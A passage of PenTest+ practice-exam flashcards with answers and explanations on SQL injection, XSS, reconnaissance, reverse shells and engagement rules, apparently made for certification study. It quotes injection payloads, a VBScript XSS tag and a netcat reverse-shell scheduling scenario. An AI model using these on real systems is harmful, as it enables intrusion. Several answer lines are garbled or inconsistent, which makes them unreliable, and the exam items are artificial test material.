Explanation:
OBJ-5.3: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” would be correct.

Question 39

Q

A security engineer is using the Kali Linux operating system and is writing exploits in C++. What command should they use to compile their new exploit and name it notepad.exe?

A.g+ + -i exploit.pl -o notepad.exe
B.g+ + –compile -i exploit.cpp -p notepad.exe
C.g + + exploit.cpp -o notepad.exe
D.g + + exploit.py -o notepad.exe

Answer

A

C.g + + exploit.cpp -o notepad.exe

Explanation:
OBJ-2.4: g++ is free C++ compiler that is available across a wide variety of operating systems, and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is “g++ filename -o outputfile”, so “g++ exploit.cpp -0 notepad.exe” is correct.

Question 40

Q

What type of technique does exploit chaining often implement?
A.Injecting parameters into a connection string using semicolons as a separator
B.Inserting malicious JavaScript code into input parameters
C.Setting a users session identifier (SID) to an explicit known value
D.Adding multiple parameters with the same name in HTTP requests

Answer

A

A.Injecting parameters into a connection string using semicolons as a separator

Explanation:
OBJ-2.4: Connection String Parameter Pollution (CSPP) exploits specifically the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. CSPP, if carried out successfully, can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out (low access complexity) and the potential results it can have (high impact). Exploit chaining involves multiple commands and exploits being conducted in a series to attack or exploit a given target fully.

Question 41

Q

You have received a laptop from a user who recently left the company. You went to the terminal in the operating system and typed ‘history’ into the prompt and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> for I in seq 255; ping -c 1 10.1.0.$i; done
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following best describes what actions were performed by this line of code?
A.Conducted a ping sweep of the subnet
B.Sequentially sent 255 ping packets to every host on the subnet
C.Attempted to conduct a SYN scan on the network
D.COnducted a sequential ICMP echo reply to the subnet

Answer

A

A.Conducted a ping sweep of the subnet

Explanation:
OBJ-2.1: This code is performing a ping sweep of the subnet 10.1.0.0/24. The code states that for every number in the sequence from 1 to 255, conduct a ping to 10.1.0.x, where x is the number from 1 to 255. When it completes this sequence, it is to return to the terminal prompt (done). The ping command uses an echo request and then receives an echo reply from the ping’s target. A ping sweep does not use an SYN scan, which would require the use of a tool like nmap or hping.

Question 42

Q

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?
A.SQL Injection
B.CRLF Injection
C.Missing patches
D.Cross-site scripting

Answer

A

C.Missing patches

Explanation:
OBJ-2.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Question 43

Q

What is not an example of a type of support resource that a pentester might receive as part of a white box assessment?
A.SOAP Project Files
B.XSD
C.network diagram
D.PII of employees

Answer

A

D.PII of employees

Explanation:
OBJ-1.1: White box support resources include architectural diagrams, sample application requests, SDK documentation, SOAP project files, Swagger documents, WSDL/WADL, and XML Scheme Definitions (XSD). The PII of employees should not be given to a penetration tester as this could violate laws and regulations regarding maintaining the confidentiality and privacy of employee data. White-box testing falls on the opposite end of the spectrum from black-box testing, and penetration testers are given full access to source code, architecture documentation, and so forth.

Question 44

Q

What should NOT be included in your final report for the assessment and provided to the organization?
A.Executive summary
B.Methodology used
C.Findings and recommendations
D.Detailed list of cost incurred

Answer

A

D.Detailed list of cost incurred

Explanation:
OBJ-5.1: A detailed list of costs incurred is not required as part of the final report but instead would be included as part of your invoicing. Your report should contain an executive summary, your methodology used in the assessment, and your findings and prioritized recommendations.

Question 45

Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A.Man-in-the-middle attack
B.Dictionary attack
C.Session hijacking
D.Brute-force attack

Answer

A

B.Dictionary attack

Explanation:
OBJ-2.4: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

Question 46

Q

You have conducted a Google search for the “site:webserver.com -site:sales.webserver.com financial.” What results do you expect to receive?
A.Google resulting matching financial in domain webserver.com, but no results from the site sales.webserver.com
B.Google results for keyword matches from the site sales.diontraining.com that are in the domain diontraining.com but do not include the word financial
C.Google results matching all words in the query
D.Google results for keyword matches on diontraining.com and sales.diontraining.com that include the word financial

Answer

A

A.Google resulting matching financial in domain webserver.com, but no results from the site sales.webserver.com

Explanation:
OBJ-2.1: When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use –site:AAA, you will get results not explicitly on the website (AAA). In the case of this question, no results should show up from sales.webserver.com. All results should only come from diontraining.com.

Question 47

Q

(where email=support@diontraining.com and password=‘ or 7==7’)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of attack is being performed?
A.Cross-site scripting
B.XML Injection
C.SQL Injection
D.Header manipulation

Answer

A

C.SQL Injection

Explanation:
OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. The injection of unintended XML content and/or structures into an XML message can alter the application’s intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

Question 48

Q

What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings?
A.Hardening
B.Harvesting
C.WIndowing
D.Stealthing

Answer

A

A.Hardening

Explanation:
OBJ-5.3: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, unnecessary usernames or logins, and disabling or removing unnecessary services. Windows is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.

Question 49

Q

Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team’s web programmer has brought you some algorithms that may help prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo-code represents the best solution to prevent this issue?
A.if (shippingAddress <= 75) (update field) else exit
B.if (shippingAddress != 75) (update field) else exit
C.if (shippingAddress = 75) (update field) else exit
D.if (shippingAddress >= 75) (update field) else exit

Answer

A

A.if (shippingAddress <= 75) (update field) else exit

Explanation:
OBJ-3.4: To ensure that the field is not overrun by an input that is too long, input validation must occur. Checking if the shipping address is less than or equal to 75 characters before updating the field will prevent a buffer overflow from occurring in this program. If the input is 76 characters or more, then the field will not be updated, and the algorithm will exit the function.

Question 50

Q

String query = “SELECT * FROM courses WHERE courseID=’” + request.getParameter(“id”) + “’ AND certification=’”+ request.getParameter(“certification”)+”’”;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
If an attacker wanted to get a complete copy of the courses table and was able to substitute arbitrary strings for “id” and “certification”, which of the following strings allow this to occur?
A. id = “1’ OR ‘1’==’1”
B.certification =”cysa’ OR ‘1’ ==’1”
C. id = “1’ OR ‘1’ == ‘1” and certification =”cysa’ OR ‘1’==’1”
D. id = “1’ OR ‘1’ ==1” and certification = “cysa’ OR ‘1==’1”

Answer

A

C. id = “1’ OR ‘1’ == ‘1” and certification =”cysa’ OR ‘1’==’1

Explanation:
OBJ-3.4: ID and certification must be crafted so that when substituted for the “.getparameter” fields, the SQL statement formed is still complete and will return a Boolean value of true for the ENTIRE statement every time it is evaluated. The AND in the middle of the WHERE clause indicates that both the courseID and certification portion must be true to be true in every case. When this occurs, the entire table of courses would be returned. The only string that would ensure both halves of the WHERE clause always return true would be

Question 51

Q

What type of threat actor is highly funded and often backed by nation-states?
A.Hacktivist
B.Script Kiddies
C.Insider Threat
D.APT

Answer

A

D.APT

Explanation:
OBJ-1.3: Advanced Persistent Threats are a group of hackers with great capability and intent. Nation-states and other large organizations often fund them to conduct highly covert hacks over a long period of time for political or economic gain. Script kiddies are people who use existing computer scripts or code to hack into computers, lacking the expertise to write their own. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. A hacktivist is someone who uses hacking to bring about political and social change.

Question 52

Q

You have run a vulnerability scan and received the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES”

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following categories should this be classified as?
A.Web application cryptography vulnerability
B.Active Directory encryption vulnerability
C.VPN Tunnel Vulnerability
D.PKI transfer vulnerability

Answer

A

A.Web application cryptography vulnerability

Explanation:
OBJ-2.2: This vulnerability should be categories as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger protocol should be used, such as forcing the use of AES.

Question 53

Q

IMG SRC=vbscript:msgbox(“Vulnerable_to_Attack”);> originalAttribute=”SRC” originalPath=”vbscript:msgbox(“Vulnerable_to_Attack “);>”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application?
A.Cross-site scripting
B.Command injection
C.Cross-site Request Forgery
D.SQL Injection

Answer

A

A.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

Question 54

Q

During a penetration test, you find a hash value related to malware associated with an APT. What best describes what you have found?
A.Botnet
B.Indicator of compromise
C.XSRF
D.SQL Injection

Answer

A

B.Indicator of compromise

Explanation:
OBJ-5.4: An indicator of compromise is an artifact observed on a network or in an operating system that, with high confidence, indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs, or botnet command and control servers’ domain names. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A botnet consists of many Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection.

Question 55

Q

[12Nov2020 10:07:23] “GET /logon.php?user=test’+oR+7>1%20—HTTP/1.1” 200 5825
[12Nov2020 10:10:03] “GET /logon.php?user=admin’;%20—HTT{/1.1” 200 5845
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
php
include(‘../../config/db_connect.php’);
$user = $_GET[‘user’];
$pass = $_GET[‘pass’];
$sql = “SELECT * FROM USERS WHERE username = ‘$user’ AND password = ‘$pass’”;
$result = MySQL_query($sql) or die (“couldn’t execute query”);

if (MySQL_num_rows($result) !=0 ) echo ‘Authentication granted!’;
else echo ‘Authentication failed!’;
?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on source code analysis, which type of vulnerability is this web server vulnerable to?
A.SQL Injection
B.Command Injection
C.Directory Traversal
D.LDAP Injection

Answer

A

A.SQL Injection

Explanation
OBJ-3.4: Based on the log entries, it appears the attack was successful in conducting a SQL injection. Notice the escape character (‘) used in the log. A connection to the MySQL database is being used in the script, which could be exploited since no input validation is being performed. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. SQL injection is a specific type of command injection. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

Question 56

Q

A recently hired security employee at a bank was asked to perform daily scans of the bank's intranet in order to look for unauthorized devices. The new employee decides to create a script that scans the network for unauthorized devices every morning at 2:00 am. Which programming language would work best to create this script?
A.C#
B.PHP
C.Python
D.ASP.NET

Answer

A

C.Python

Explanation
OBJ-4.4: Python is a commonly used scripting language used in cybersecurity. PHP is used as a scripting language for web applications. C# and ASP.NET are both compiled languages, not scripting languages.

Question 57

Q

An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?
A.locate type=ns
B.transfer type=ns
C.request type=ns
D. set type=ns

Answer

A

D. set type=ns

Explanation:
OBJ-4.2: The “set type=ns” tells nslookup only reports information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

Question 58

Q

What kind of security vulnerability would a newly discovered flaw in a software application be considered?
A.Input validation flaw
B.Time-to-check to time-to-use flaw
C.HTTP header injection vulnerability
D.Zero-day vulnerability

Answer

A

D.Zero-day vulnerability

Explanation:
OBJ-3.1: A zero-day vulnerability refers to a hole in software unknown to the vendor and newly discovered. This security hole can become exploited by hackers before the vendor becomes aware of it and can fix it. An input validation attack is any malicious action against a computer system that involves manually entering strange information into a normal user input field that is successful due to an input validation flaw. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. The time of check to time of use is a class of software bug caused by changes in a system between checking a condition (such as a security credential) and the use of the results of that check; This is an example of a race condition.

Question 59

Q

Which type of method is used to collect information during the passive reconnaissance?
A.Network traffic sniffing
B.Man in the middle attacks
C.Publicly accessible sources
D.Social engineering

Answer

A

C.Publicly accessible sources

Explanation:
OBJ-2.1: Passive reconnaissance focuses on collecting information that is widely and openly available from publicly accessible sources. While network traffic sniffing is considered passive, gaining access to the network to place a sniffer in a good network tap location would not be considered passive. Of the choices provided, publicly accessible sources are the best answer to choose. Man-in-the-middle attacks would involve a penetration tester coming in between the traffic source and destination, which would allow its active inception and possible modification. Social engineering is also an active reconnaissance technique that uses deception to trick a user into providing information to an attacker or penetration tester.

Question 60

Q

What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?
A.NDA
B.SOW
C.MSA
D.Corporate Policy

Answer

A

A.NDA

Explanation:
OBJ-1.2: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: One from the organization to the pentester and another from the pentester to the organization. The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the size and scope of the assessment and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

Question 61

Q

During a penetration test, you conduct an exploit that creates a denial of service condition by crashing the httpd server. What should you do?
A.Pivot to another machine
B.Immediately contact the organization and inform them of the issue
C.Continue with the exploitation
D.Contact the organizations customer service department and conduct further information gathering

Answer

A

B.Immediately contact the organization and inform them of the issue

Explanation:
OBJ-5.4: If at any point during an assessment, an issue arises due to your actions, then you should immediately stop exploitation and contact the trusted point of contact provided by the organization. You should not continue your exploitation or pivot to another machine. While you may contact the organization’s customer service department, you first need to verify if that is part of the allowed communication procedures outlined in the assessment plan. If you are conducting a red team event, the customer service team may be the target and not be informed of the issues directly. As a pentester, you should notify your trusted point of contact within the organization, per your approved test plan.

Question 62

Q

What tool is used to collect wireless packet data?
A.John the Ripper
B.Netcat
C.Nessus
D.Aircrack -ng

Answer

A

D.Aircrack -ng

Explanation:
OBJ-3.3: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

Question 63

Q

What type of malicious application does not require user intervention or another application to act as a host to replicate?
A.MAcro
B.Worm
C.Trojan
D.Virus

Answer

A

B.Worm

Explanation:
OBJ-3.1: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host for it to replicate. Viruses and Macros require user intervention to spread, and Trojans are hosted within another application that appears harmless.

Question 64

Q

What technique is most effective in determining whether or not increasing end-user security training would benefit the organization during your technical assessment of their network?
A.Network sniffing
B.Application security testing
C.Social Engineering
D.Vulnerability scanning

Answer

A

C.Social Engineering

Explanation:
OBJ-3.1: Social engineering refers to the psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, utilizing social engineering techniques such as phishing or pharming can help you determine if additional end-user security training should be included in the organization. The other three options focus solely on technical controls. Therefore adding end-user training would not effect these technology options.

Answer 65

A

D.Modifying log files

Explanation;
OBJ-5.2: Pentesters rarely need to modify log files, and it should not be conducted after an assessment/engagement has occurred. When an assessment is complete, the pentester should remove any shells, tester-created credentials, or tools from the victimized hosts to ensure an attacker does not utilize them against the organization, too.

Answer 66

A

D.Your email server is running on a non-standard port

Explanation:
OBJ-2.2: As shown in the nmap scans’ output, only two standard ports are being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.

Answer 67

A

C.Lessons learned report

Explanation:
OBJ-5.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. The chain of custody report is the chronological documentation or paper trail that records the custody, control, transfer, analysis, and disposition of physical or electronic evidence.

Answer 68

A

B.Scoping

Explanation
OBJ-1.3: Scoping is not one of the four steps in the NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment) methodology. The four steps are Planning, Discovery, Attack, and Reporting.

Answer 69

A

A.The host is using the Windows task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network

Explanation
OBJ-3.5: The code is setting up a task using Windows Task Scheduler (at). This task will run netcat (nc.exe) each day at the specified time (10:42). This is the netcat program and is being run from the c:\temp directory to create a reverse shell by executing the command shell (-e cmd.exe) and connecting it back to the attacker’s machine at 172.16.34.12 over port 443.

Answer 70

A

C.Set “RemoveServerHeader” to 1 in the URLScan.ini configuration file

Explanation:
OBJ-3.5: This output is an example of banner grabbing being conducted against your web server. To prevent valuable information from being sent in the response, you should configure the “RemoveServerHeader” in the Microsoft IIS configuration file (URLScan.ini). If you set “RemoveServerHeader” to 1, UrlScan will remove the server header on all responses, and the value of AlternateServerName will be ignored. If you set “EnableLogging” to 1, UrlScan will log its actions in a file called UrlScan.log that will be created in the same directory that contains UrlScan.dll. If you set “PerProcessLogging” to 1, UrlScan will append the process ID of the IIS process that is hosting UrlScan.dll to the log file name; for example, UrlScan.1234.log. If you set “VerifyNormalization” to 1, UrlScan verifies the URL’s normalization and will defend against canonicalization attacks, where a URL contains a double encoded string in the URL. Please note, this question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s complete content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess, and move on!

Brainscape's Knowledge GenomeTM

Jason Dion's Pentest+ Course Practice Exam Flashcards

Brainscape's Knowledge Genome^TM